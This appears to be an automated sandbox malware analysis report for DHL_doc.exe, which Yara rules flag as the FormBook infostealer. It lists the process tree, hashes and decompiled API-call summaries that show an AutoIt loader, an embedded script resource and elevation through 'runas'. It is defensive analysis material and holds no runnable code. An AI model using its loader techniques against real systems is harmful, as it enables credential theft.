Path:	C:\Users\user\Desktop\DHL_doc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL_doc.exe"
Imagebase:	0xec0000
File size:	1'715'200 bytes
MD5 hash:	5FCCC46E9F84DCBF89E7A5F6E316D48E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:08:38
Start date:	07/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL_doc.exe"
Imagebase:	0xc80000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1958580078.00000000071C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1951242862.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1951751697.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:08:55
Start date:	07/11/2024
Path:	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe"
Imagebase:	0x590000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3565909815.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	02:08:57
Start date:	07/11/2024
Path:	C:\Windows\SysWOW64\AtBroker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\AtBroker.exe"
Imagebase:	0x510000
File size:	68'608 bytes
MD5 hash:	D5B61959A509BDA85300781F5A829610
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3566004775.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3566049277.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3564847310.0000000002E90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	02:09:14
Start date:	07/11/2024
Path:	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe"
Imagebase:	0x590000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3567573313.0000000005450000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:09:26
Start date:	07/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	1.2%
Signature Coverage:	3.5%
Total number of Nodes:	1514
Total number of Limit Nodes:	44

Executed Functions

Function 00EC42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00EC430D

Part of subcall function 00EC6B57: _wcslen.LIBCMT ref: 00EC6B6A

GetCurrentProcess.KERNEL32(?,00F5CB64,00000000,?,?), ref: 00EC4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00EC4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00EC4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EC4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00EC4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 00EC447B
GetSystemInfo.KERNEL32(?,?,?), ref: 00EC44A0

Strings

|O, xrefs: 00F036F8
GetNativeSystemInfo, xrefs: 00EC4460
kernel32.dll, xrefs: 00EC444F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 770f47040dd9cb41b9cb2c4af68c4a8d0fe21a864950f43b4c6d67f448740bef
Instruction ID: 7b8041a03b264d29a9f5a2ca9ae3fe436c0dc435d8271582ff956d9c417f6140
Opcode Fuzzy Hash: 770f47040dd9cb41b9cb2c4af68c4a8d0fe21a864950f43b4c6d67f448740bef
Instruction Fuzzy Hash: C4A1D5A590A3CEDFC716C7B97D40EE53FB87B26300B1854BFE481A3AA1D2214509FB61

Function 00EC42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EC50AA,?,?,00000000,00000000), ref: 00EC42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EC50AA,?,?,00000000,00000000), ref: 00EC42C9
LoadResource.KERNEL32(?,00000000,?,?,00EC50AA,?,?,00000000,00000000,?,?,?,?,?,?,00EC4F20), ref: 00F035BE
SizeofResource.KERNEL32(?,00000000,?,?,00EC50AA,?,?,00000000,00000000,?,?,?,?,?,?,00EC4F20), ref: 00F035D3
LockResource.KERNEL32(00EC50AA,?,?,00EC50AA,?,?,00000000,00000000,?,?,?,?,?,?,00EC4F20,?), ref: 00F035E6

Strings

SCRIPT, xrefs: 00EC42BF

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: b9806228d57eb89911516244d1a2af71a0dfcd8428db223b0f2ba3610c8f6e70
Instruction ID: 8224779bba72b8fce58713118f850d23cad95c10be55db304379d0a9e4c1c8fb
Opcode Fuzzy Hash: b9806228d57eb89911516244d1a2af71a0dfcd8428db223b0f2ba3610c8f6e70
Instruction Fuzzy Hash: 0411ACB0200304BFD7259B65DD49F677BB9EBC5B52F20416DF903962A0DB72D800E660

Function 00F02BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00EC2B6B

Part of subcall function 00EC3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F91418,?,00EC2E7F,?,?,?,00000000), ref: 00EC3A78

Part of subcall function 00EC9CB3: _wcslen.LIBCMT ref: 00EC9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00F82224), ref: 00F02C10
ShellExecuteW.SHELL32(00000000,?,?,00F82224), ref: 00F02C17

Strings

runas, xrefs: 00F02C0B

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: fb46cae58d721e7860b372d021f848235e798c524df71a18805daf1b7f6ec0a5
Instruction ID: 7d81b6138e07724e89e635e1eb039333ae0b4aabc647a7dd851eb166e335b32a
Opcode Fuzzy Hash: fb46cae58d721e7860b372d021f848235e798c524df71a18805daf1b7f6ec0a5
Instruction Fuzzy Hash: 1511A2312083455AC714FF74DA55FAEBBE4AB95710F44643DF252620A3CF228A4BA752

Function 00ECD730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00ECD807
timeGetTime.WINMM ref: 00ECDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ECDB28
TranslateMessage.USER32(?), ref: 00ECDB7B
DispatchMessageW.USER32(?), ref: 00ECDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ECDB9F
Sleep.KERNEL32(0000000A), ref: 00ECDBB1

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 4e9f4b91f498b7698eb7cff671067052486d519a111f8e1dbe3d88b9aa8bffbf
Instruction ID: 35840316ef51c69f9d9fbc0f53b2c5607b8f2190274e4993d2a20fbbd9e728c4
Opcode Fuzzy Hash: 4e9f4b91f498b7698eb7cff671067052486d519a111f8e1dbe3d88b9aa8bffbf
Instruction Fuzzy Hash: F6422130608341AFD728CF24CD84FAAB7E0FF85314F14552EE556A7291D772E896EB82

Function 00EC2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00EC2D07
RegisterClassExW.USER32(00000030), ref: 00EC2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC2D42
InitCommonControlsEx.COMCTL32(?), ref: 00EC2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC2D6F
LoadIconW.USER32(000000A9), ref: 00EC2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC2D94

Strings

+, xrefs: 00EC2CF0
AutoIt v3 GUI, xrefs: 00EC2D23
0, xrefs: 00EC2CE9
TaskbarCreated, xrefs: 00EC2D37

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 09e34aa8e8e6a80e1d9ea8ccff8e12e1f1e340bf37d086b32474636808e9c3c9
Instruction ID: ce6fe701a1a8499821dbd38a4ee3bd2319d3b14cd6e22ddeb1c54945d6e734e7
Opcode Fuzzy Hash: 09e34aa8e8e6a80e1d9ea8ccff8e12e1f1e340bf37d086b32474636808e9c3c9
Instruction Fuzzy Hash: 7921C3B590131DAFDB00DFA4EC49BDDBBB4FB08701F10412AFA12A62A0D7B54544EF91

Function 00F0065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F0039A: CreateFileW.KERNELBASE(00000000,00000000,?,00F00704,?,?,00000000,?,00F00704,00000000,0000000C), ref: 00F003B7

GetLastError.KERNEL32 ref: 00F0076F
__dosmaperr.LIBCMT ref: 00F00776
GetFileType.KERNELBASE(00000000), ref: 00F00782
GetLastError.KERNEL32 ref: 00F0078C
__dosmaperr.LIBCMT ref: 00F00795
CloseHandle.KERNEL32(00000000), ref: 00F007B5
CloseHandle.KERNEL32(?), ref: 00F008FF
GetLastError.KERNEL32 ref: 00F00931
__dosmaperr.LIBCMT ref: 00F00938

Strings

H, xrefs: 00F008BD

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 052a13f9734581dd395c0e9d77fec2145187b9a9e997a9926eef5cce2197aa2d
Instruction ID: d4918b6a7401cf235c45546c172e5d2118533ef5ab37d89ec2939715bf497cfe
Opcode Fuzzy Hash: 052a13f9734581dd395c0e9d77fec2145187b9a9e997a9926eef5cce2197aa2d
Instruction Fuzzy Hash: E2A14732A001488FDF19EF68DC51BAD3BE1EB46324F14415AF815AB3E1DB359D12EB91

Function 00EC344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EC3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F91418,?,00EC2E7F,?,?,?,00000000), ref: 00EC3A78

Part of subcall function 00EC3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00EC3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00EC356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F0318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F031CE
RegCloseKey.ADVAPI32(?), ref: 00F03210
_wcslen.LIBCMT ref: 00F03277
_wcslen.LIBCMT ref: 00F03286

Strings

Software\AutoIt v3\AutoIt, xrefs: 00EC3560
Include, xrefs: 00F03184, 00F031C5
\, xrefs: 00F0328C
\Include\, xrefs: 00EC3527

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 01797b533b02980583529f7b048ec3cc4f05c82c09083c474af309034ad4a7df
Instruction ID: eec8229ca00aafc53b6857671f78049bb0a0bfce056748faebfc57ad24dfe8d9
Opcode Fuzzy Hash: 01797b533b02980583529f7b048ec3cc4f05c82c09083c474af309034ad4a7df
Instruction Fuzzy Hash: 7971C171405304AEC354DF69EC82DAFBBE8FF85350F40192EF545A31A1EB319A49EB92

Function 00EC2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00EC2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00EC2B9D
LoadIconW.USER32(00000063), ref: 00EC2BB3
LoadIconW.USER32(000000A4), ref: 00EC2BC5
LoadIconW.USER32(000000A2), ref: 00EC2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EC2BEF
RegisterClassExW.USER32(?), ref: 00EC2C40

Part of subcall function 00EC2CD4: GetSysColorBrush.USER32(0000000F), ref: 00EC2D07
Part of subcall function 00EC2CD4: RegisterClassExW.USER32(00000030), ref: 00EC2D31
Part of subcall function 00EC2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EC2D42
Part of subcall function 00EC2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00EC2D5F
Part of subcall function 00EC2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EC2D6F
Part of subcall function 00EC2CD4: LoadIconW.USER32(000000A9), ref: 00EC2D85
Part of subcall function 00EC2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EC2D94

Strings

0, xrefs: 00EC2C0F
#, xrefs: 00EC2C16
AutoIt v3, xrefs: 00EC2C2F

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 811c863c8adc2d6a0d1dfd9205c9711cc7aa01185f57681dc1c315009e38c55b
Instruction ID: 4c53af011fa4056a39c2a1fcd0b54ba154f39443e861b6d98badfd2188461c5b
Opcode Fuzzy Hash: 811c863c8adc2d6a0d1dfd9205c9711cc7aa01185f57681dc1c315009e38c55b
Instruction Fuzzy Hash: 14211870E0031DAFDB119FA5EC55FAA7FB4FB48B50F04412BE605A66A0D7B20540EF90

Function 00EC3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00EC316A,?,?), ref: 00EC31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,00EC316A,?,?), ref: 00EC3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EC3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00EC316A,?,?), ref: 00EC3232
CreatePopupMenu.USER32 ref: 00EC3246
PostQuitMessage.USER32(00000000), ref: 00EC3267

Strings

TaskbarCreated, xrefs: 00EC322D

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 7e14f416c5f643398687af3a142cadcf772b77a4b16dfbb9a6046daa22985a0e
Instruction ID: 94609698ac968be3d7aed0d5d1a8d5a96d69e28cc81c917aed074e8a4c8e9ba4
Opcode Fuzzy Hash: 7e14f416c5f643398687af3a142cadcf772b77a4b16dfbb9a6046daa22985a0e
Instruction Fuzzy Hash: 23412931644309AEDF191B78DE0EFF93A65F705355F08912EF602A55A2C7638E03BBA1

Function 024C25F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 024C26C1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 024C28E7

Memory Dump Source

Source File: 00000000.00000002.1707663242.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24c0000_DHL_doc.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: bf8eb0b0182f2c6375309ce72d57151becbc71c469063f0e3e3a0f0901fff07f
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 47A1EA78E04209EBDB54CF98C894BEEB7B5BF48704F20855EE501BB280D7B55A85CF64

Function 00EC2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EC2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00EC1CAD,?), ref: 00EC2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00EC1CAD,?), ref: 00EC2CCF

Strings

AutoIt v3, xrefs: 00EC2C89, 00EC2C8E, 00EC2C8F
edit, xrefs: 00EC2CAC

Memory Dump Source

Source File: 00000000.00000002.1706869650.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.1706854118.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706913103.0000000000F82000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706948687.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706963068.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_DHL_doc.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 4aa82162819764c6ff02f4dbf284d5b20955588df5d5c371804b6a5273adfe08
Instruction ID: 848547fe7dafec8bb2e51aeca611eb72aac14fd440283a064223839cf5891b80
Opcode Fuzzy Hash: 4aa82162819764c6ff02f4dbf284d5b20955588df5d5c371804b6a5273adfe08
Instruction Fuzzy Hash: DDF0DA755403997EEB311727AC08E773EBDE7CAF51B00006AFA04A35A0C6721854FAB0

Function 024C23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 024C22A0: Sleep.KERNELBASE(000001F4), ref: 024C22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024C24E6

Strings

W0JDY0Q8DD, xrefs: 024C2549, 024C254C

Memory Dump Source

Source File: 00000000.00000002.1707663242.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24c0000_DHL_doc.jbxd

Similarity

API ID: CreateFileSleep
String ID: W0JDY0Q8DD
API String ID: 2694422964-2829551620
Opcode ID: 33a26692b43b22ae48015ab7862ab6056a595ba4ab7aec4712ac660e9e2c29e6
Instruction ID: c79c145c8939925e84b75537fb33b323793c8196f13508918d8cfe9bd2351a9d
Opcode Fuzzy Hash: 33a26692b43b22ae48015ab7862ab6056a595ba4ab7aec4712ac660e9e2c29e6
Instruction Fuzzy Hash: CE519034E14248EBEF11DBA4C865BEFB779AF58700F104199E608BB2C0D7B91B45CBA5

Function 00EC3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00EC3B0F,SwapMouseButtons,00000004,?), ref: 00EC3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00EC3B0F,SwapMouseButtons,00000004,?), ref: 00EC3B61
